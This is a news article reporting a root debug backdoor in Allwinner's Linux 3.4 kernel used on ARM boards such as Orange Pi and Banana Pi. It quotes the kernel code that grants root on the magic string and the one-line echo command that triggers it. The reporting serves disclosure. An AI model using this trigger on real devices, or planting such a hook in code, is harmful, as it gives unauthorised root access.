This is what a root debug backdoor in a Linux kernel looks like

Allwinner's all-loser code makes it into shipped firmware


A root backdoor for debugging ARM-powered Android gadgets managed to end up in shipped firmware – and we're surprised this sort of colossal blunder doesn't happen more often.

The howler is the work of Chinese ARM SoC-maker Allwinner, which wrote its own kernel code underneath a custom Android build for its devices.

Its Linux 3.4-based kernel code, on Github here, contains what looks to The Register like a debug mode the authors forgot to kill. Although it doesn't appear to have made it into the mainstream kernel source, it was picked up by firmware builders for various gadgets using Allwinner's chips.

It's triggered by writing rootmydevice to the special file /proc/sunxi_debug/sunxi_debug. That gives the current running process root privileges. If that file is present on your device or single-board computer, then you need to get rid of it. This is the code that checks for the magic write:

        if(!strncmp("rootmydevice",(char*)buf,12)){
                cred = (struct cred *)__task_cred(current);
                cred->uid = 0;
                cred->gid = 0;
                cred->suid = 0;
                cred->euid = 0;
                cred->euid = 0;
                cred->egid = 0;
                cred->fsuid = 0;
                cred->fsgid = 0;
                printk("now you are root\n");
        }

Tkaiser, a moderator over at the forums of the Armbian operating system (a Linux distro for ARM-based development boards) notes there's a number of vulnerable systems in the field.

As tkaiser writes, echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug "from any process with any UID will get root, and it's probably remotely exploitable if combined with networked services that might allow access to /proc."

He adds: “This security flaw is currently present in every OS image for H3, A83T or H8 devices that rely on kernel 3.4.”

As well as all Orange Pi images except for Armbian's freshly patched 5.10, these vulnerable gadgets include ARM dev boards from FriendlyARM, SinoVoip (its M2+ and M3 Banana Pi boards), Cubietruck, and LinkSprite's pcDuino8 Uno.

There are probably other products out there using the Allwinner SoC and the dodgy code. Tkaiser pointed out that FriendlyARM was also quick to issue a patch. ®


Other stories you might like

  • Intel is running rings around AMD and Arm at the edge
    What will it take to loosen the x86 giant's edge stranglehold?

    Analysis Supermicro launched a wave of edge appliances using Intel's newly refreshed Xeon-D processors last week. The launch itself was nothing to write home about, but a thought occurred: with all the hype surrounding the outer reaches of computing that we call the edge, you'd think there would be more competition from chipmakers in this arena.

    So where are all the AMD and Arm-based edge appliances?

    A glance through the catalogs of the major OEMs – Dell, HPE, Lenovo, Inspur, Supermicro – returned plenty of results for AMD servers, but few, if any, validated for edge deployments. In fact, Supermicro was the only one of the five vendors that even offered an AMD-based edge appliance – which used an ageing Epyc processor. Hardly a great showing from AMD. Meanwhile, just one appliance from Inspur used an Arm-based chip from Nvidia.

    Continue reading
  • HPE unveils Arm-based ProLiant server for cloud-native workloads
    Looks like it went with Ampere's Altra and Altra Max processors

    Arm has a champion in the shape of HPE, which has added a server powered by the British chip designer's CPU cores to its ProLiant portfolio, aimed at cloud-native workloads for service providers and enterprise customers alike.

    Announced at the IT titan's Discover 2022 conference in Las Vegas, the HPE ProLiant RL300 Gen11 server is the first in a series of such systems powered by Ampere's Altra and Altra Max processors, which feature up to 80 and 128 Arm-designed Neoverse cores, respectively.

    The system is set to be available during Q3 2022, so sometime in the next three months, and is basically an enterprise-grade ProLiant server – but with an Arm processor at its core instead of the more usual Intel Xeon or AMD Epyc X86 chips.

    Continue reading
  • Arm most likely to list on the Nasdaq, says SoftBank CEO
    Hopes of securing London listing for UK chip designer may be in vain

    Arm is most likely to list on the US stock exchange Nasdaq, according to Masayoshi Son, chief executive of SoftBank Group, which bought the chip designer in 2016 for $32 billion.

    Although he stressed no final decision had been made, Son told investors that the British chip designer was better suited to a US listing. "Most of Arm's clients are based in Silicon Valley and... stock markets in the US would love to have Arm," Son told shareholders at the company's annual general meeting.

    He said there were also requests to list Arm in London without elaborating on where they came from. The entrepreneur did not say whether the conglomerate is considering a secondary listing for Arm there.

    Continue reading

Biting the hand that feeds IT © 1998–2022